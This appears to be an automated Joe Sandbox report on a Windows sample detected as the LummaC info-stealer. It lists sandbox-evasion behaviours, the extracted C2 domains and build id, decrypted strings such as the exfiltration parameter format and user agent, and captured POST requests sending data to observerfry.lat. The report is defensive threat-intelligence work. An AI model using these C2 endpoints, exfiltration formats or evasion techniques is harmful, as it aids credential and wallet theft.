Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yO9EAqDV15.exe

Overview

General Information

Sample name:yO9EAqDV15.exe
renamed because original name is a hash value
Original sample name:dcbbfbd538d99feec781122f6c905c1b.exe
Analysis ID:1580269
MD5:dcbbfbd538d99feec781122f6c905c1b
SHA1:79c4ae40ce7ad4cdb319e7021d21b99f0390725f
SHA256:08c295782e51777d84b3ab08c49b1d3bedb4126fb88ed9ef47aa81fe8181adea
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • yO9EAqDV15.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\yO9EAqDV15.exe" MD5: DCBBFBD538D99FEEC781122F6C905C1B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["observerfry.lat", "manyrestro.lat", "shapestickyr.lat", "wordyfindy.lat", "talkynicer.lat", "bashfulacid.lat", "slipperyloo.lat", "tentabatte.lat", "curverpluch.lat"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: yO9EAqDV15.exe PID: 7412JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: yO9EAqDV15.exe PID: 7412JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: yO9EAqDV15.exe PID: 7412JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T08:35:33.462263+010020283713Unknown Traffic192.168.2.449730172.67.199.72443TCP
              2024-12-24T08:35:35.436820+010020283713Unknown Traffic192.168.2.449731172.67.199.72443TCP
              2024-12-24T08:35:37.820054+010020283713Unknown Traffic192.168.2.449732172.67.199.72443TCP
              2024-12-24T08:35:40.333242+010020283713Unknown Traffic192.168.2.449733172.67.199.72443TCP
              2024-12-24T08:35:42.550856+010020283713Unknown Traffic192.168.2.449734172.67.199.72443TCP
              2024-12-24T08:35:45.127460+010020283713Unknown Traffic192.168.2.449735172.67.199.72443TCP
              2024-12-24T08:35:47.664337+010020283713Unknown Traffic192.168.2.449737172.67.199.72443TCP
              2024-12-24T08:35:52.048837+010020283713Unknown Traffic192.168.2.449742172.67.199.72443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T08:35:34.211279+010020546531A Network Trojan was detected192.168.2.449730172.67.199.72443TCP
              2024-12-24T08:35:36.203824+010020546531A Network Trojan was detected192.168.2.449731172.67.199.72443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T08:35:34.211279+010020498361A Network Trojan was detected192.168.2.449730172.67.199.72443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T08:35:36.203824+010020498121A Network Trojan was detected192.168.2.449731172.67.199.72443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T08:35:45.894729+010020480941Malware Command and Control Activity Detected192.168.2.449735172.67.199.72443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: yO9EAqDV15.exeAvira: detected
              Found malware configuration
              Source: yO9EAqDV15.exe.7412.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["observerfry.lat", "manyrestro.lat", "shapestickyr.lat", "wordyfindy.lat", "talkynicer.lat", "bashfulacid.lat", "slipperyloo.lat", "tentabatte.lat", "curverpluch.lat"], "Build id": "PsFKDg--pablo"}
              Multi AV Scanner detection for submitted file
              Source: yO9EAqDV15.exeReversingLabs: Detection: 57%
              Source: yO9EAqDV15.exeVirustotal: Detection: 50%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: yO9EAqDV15.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: bashfulacid.lat
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: tentabatte.lat
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: curverpluch.lat
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: talkynicer.lat
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: shapestickyr.lat
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: manyrestro.lat
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: slipperyloo.lat
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: wordyfindy.lat
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: observerfry.lat
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
              Source: yO9EAqDV15.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49737 version: TLS 1.2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.199.72:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.199.72:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.199.72:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.199.72:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 172.67.199.72:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: observerfry.lat
              Source: Malware configuration extractorURLs: manyrestro.lat
              Source: Malware configuration extractorURLs: shapestickyr.lat
              Source: Malware configuration extractorURLs: wordyfindy.lat
              Source: Malware configuration extractorURLs: talkynicer.lat
              Source: Malware configuration extractorURLs: bashfulacid.lat
              Source: Malware configuration extractorURLs: slipperyloo.lat
              Source: Malware configuration extractorURLs: tentabatte.lat
              Source: Malware configuration extractorURLs: curverpluch.lat
              Source: Joe Sandbox ViewIP Address: 172.67.199.72 172.67.199.72
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.199.72:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.199.72:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.199.72:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.199.72:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.199.72:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.199.72:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.199.72:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.199.72:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: observerfry.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YQQFKK6DE2Y0H6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18139Host: observerfry.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KC6ECR53FPBPHPG89User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8778Host: observerfry.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SGHG9EE2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20377Host: observerfry.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=851Y5PCU9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1211Host: observerfry.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VIKTP4GUVP9FTTVZ8IEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571708Host: observerfry.lat
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: observerfry.lat
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
              Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: yO9EAqDV15.exe, 00000000.00000003.2126187612.00000000017F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microp;
              Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: yO9EAqDV15.exe, 00000000.00000003.2051214971.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2027251253.0000000005F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/
              Source: yO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/$
              Source: yO9EAqDV15.exe, 00000000.00000003.2136977389.00000000017B4000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000002.2138085076.00000000017B4000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000002.2137952740.00000000017A3000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2136686014.00000000017A3000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2027843389.000000000181F000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2027207169.0000000005F65000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2027478035.000000000181F000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2126425221.00000000017B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api
              Source: yO9EAqDV15.exe, 00000000.00000003.2126425221.00000000017B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apiw
              Source: yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2079708593.0000000001809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/d
              Source: yO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2079708593.0000000001809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/pi
              Source: yO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2079708593.0000000001809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/apiexe
              Source: yO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/apiy.exe
              Source: yO9EAqDV15.exe, 00000000.00000003.1981644973.0000000005FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: yO9EAqDV15.exe, 00000000.00000003.2006014483.0000000005FB9000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981644973.0000000005FC0000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: yO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: yO9EAqDV15.exe, 00000000.00000003.2006014483.0000000005FB9000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981644973.0000000005FC0000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005FB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: yO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49737 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: yO9EAqDV15.exeStatic PE information: section name:
              Source: yO9EAqDV15.exeStatic PE information: section name: .idata
